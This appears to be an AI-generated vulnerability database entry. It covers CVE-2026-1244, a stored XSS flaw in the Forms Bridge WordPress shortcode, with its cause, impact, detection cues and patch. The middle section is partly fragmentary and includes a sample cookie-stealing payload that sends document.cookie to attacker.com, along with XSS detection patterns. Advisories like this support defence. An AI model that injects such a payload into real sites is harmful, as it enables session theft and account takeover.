
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1244 is a Stored Cross-Site Scripting (XSS) vulnerability in the Forms Bridge – Infinite integrations WordPress plugin, affecting all versions up to and including 4.2.5. The flaw resides in the financoop_campaign shortcode's id attribute, where insufficient input sanitization and output escaping in the forms_bridge_financoop_shortcode_error function allows authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages. It was published on January 28, 2026, and assigned a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting). The vulnerable code path is in forms_bridge_financoop_shortcode_error within the financoop/shortcodes.php file, where the user-supplied id parameter of the [financoop_campaign] shortcode is neither sanitized on input nor escaped on output before being rendered in the page HTML. An attacker with at least Contributor-level WordPress access can embed a malicious shortcode containing a JavaScript payload in a post or page; the script executes in the browser of any user who subsequently views that content (Wordfence, WordPress Trac).
Successful exploitation allows an authenticated attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the context of any visitor's browser — including administrators. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (such as privilege escalation or backdoor installation), and defacement of site content. The CVSS scope is marked as Changed, indicating the impact extends beyond the vulnerable component to affect other users' browsers (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1244 as of the available data. The EPSS score is approximately 0.03%, indicating a low probability of near-term exploitation. The vulnerability requires authenticated access at the Contributor level, which somewhat limits the attack surface. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, Red Hat CVE).
/wp-content/plugins/forms-bridge/ path).[financoop_campaign id="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].id value is stored in the database.[financoop_campaign id="..."] shortcodes containing HTML tags or JavaScript (<script>, onerror=, onload=, etc.) by Contributor-level users.forms-bridge/addons/financoop/shortcodes.php or other plugin files that may indicate post-exploitation tampering.financoop_campaign shortcode — potentially visible in web proxy or WAF logs.wp_posts table containing [financoop_campaign id= with embedded script tags or encoded JavaScript payloads.Update the Forms Bridge – Infinite integrations plugin to a version beyond 4.2.5 that includes the fix for this vulnerability. The patch was introduced in changeset 3446693 on the WordPress plugin repository (WordPress Trac Changeset). As an interim workaround, restrict Contributor-level user registration and review existing Contributor accounts for suspicious shortcode usage. Site administrators should also consider deploying a Web Application Firewall (WAF) with XSS filtering rules to reduce exposure while patching.
Wordfence published the vulnerability in their weekly WordPress vulnerability report covering January 26 – February 1, 2026, and included it in their threat intelligence feed (Wordfence Blog). Spanish national cybersecurity agencies INCIBE-CERT and CCN-CERT also issued early-warning advisories for the vulnerability (INCIBE, CCN-CERT). Community coverage was otherwise limited, consistent with the medium severity and low EPSS score of the vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."